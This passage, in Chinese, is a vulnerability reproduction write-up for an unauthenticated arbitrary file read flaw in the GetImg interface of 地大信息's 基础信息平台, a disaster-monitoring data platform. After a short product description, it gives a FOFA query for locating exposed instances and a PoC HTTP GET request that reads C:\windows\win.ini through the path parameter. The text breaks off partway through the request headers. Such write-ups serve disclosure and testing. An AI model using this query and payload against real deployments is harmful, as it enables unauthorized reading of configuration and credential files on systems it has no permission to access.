地大信息-基础信息平台 GetImg 任意文件读取漏洞复现
0x01 产品简介
地大信息的基础信息平台,通过整合各类空间基础数据,包括地理、地质、气象等多源信息,构建了一个空-天-地一体化的自然灾害监测物联网和时空感知大数据平台。该平台不仅支持数据的集成、管理和共享,还提供了丰富的数据分析和应用服务,为政府决策、行业监管和公众服务提供有力支持。
0x02 漏洞概述
地大信息-基础信息平台 GetImg 接口存在任意文件读取漏洞,未经身份验证攻击者可通过该漏洞读取系统重要文件(如数据库配置文件、系统配置文件)、数据库配置文件等等,导致网站处于极度不安全状态。
0x03 复现环境
FOFA:
body="/SystemManage/BaseProject" || title=="基础信息平台"
0x04 漏洞复现
PoC
GET /SystemManage/BaseProject/GetImg?path=C:\windows\win.ini HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT